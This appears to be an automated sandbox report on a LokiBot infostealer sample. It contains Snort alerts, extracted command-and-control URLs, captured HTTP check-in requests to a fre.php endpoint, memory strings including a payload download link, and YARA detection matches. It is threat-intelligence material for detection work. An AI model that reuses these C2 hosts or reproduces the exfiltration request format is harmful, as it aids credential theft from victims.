Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49725 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49725
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49726 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49726 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49726 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49726 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49726 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49726
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49727 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49727 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49727 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49727 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49727 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49727
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49728 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49728 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49728 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49728 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49728 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49728
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49729 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49729 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49729 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49729 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49729 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49729
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49730 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49730 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49730 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49730 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49730 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49730
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49731 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49731 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49731 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49731 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49731 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49731
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49732 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49732 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49732 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49732 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49732 -> 141.98.6.102:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49732

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://sedesadre.gq/PKZ/PWS/fre.php

Source: Joe Sandbox View

ASN Name: CMCSUS CMCSUS

Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 198Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 198Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close
Source: global traffic	HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 171Connection: close

Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.516579808.0000000001529000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.397774648.00000000009AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521644432.000000000327E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519732360.0000000003147000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.401922859.0000000004961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 0000000E.00000002.537381760.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://sedesadre.gq/PKZ/PWS/fre.php
Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000005.00000002.320847106.0000014604A13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519404605.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edi4gw.db.files.1drv.com/y4moAVxpkKoBi-6Ib81P-C-8nQTO5eCh6D0sQf0K95pl0pcu4vWhHgGACuDQhzDgbUK
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519404605.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edi4gw.db.files.1drv.com4
Source: powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.420135572.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	String found in binary or memory: https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024%21128&authkey=AFWFoMk
Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.320944817.0000014604A27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000002.321224479.0000014604A55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321064418.0000014604A3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown

HTTP traffic detected: POST /PKZ/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sedesadre.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: ACA06F78Content-Length: 198Connection: close

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
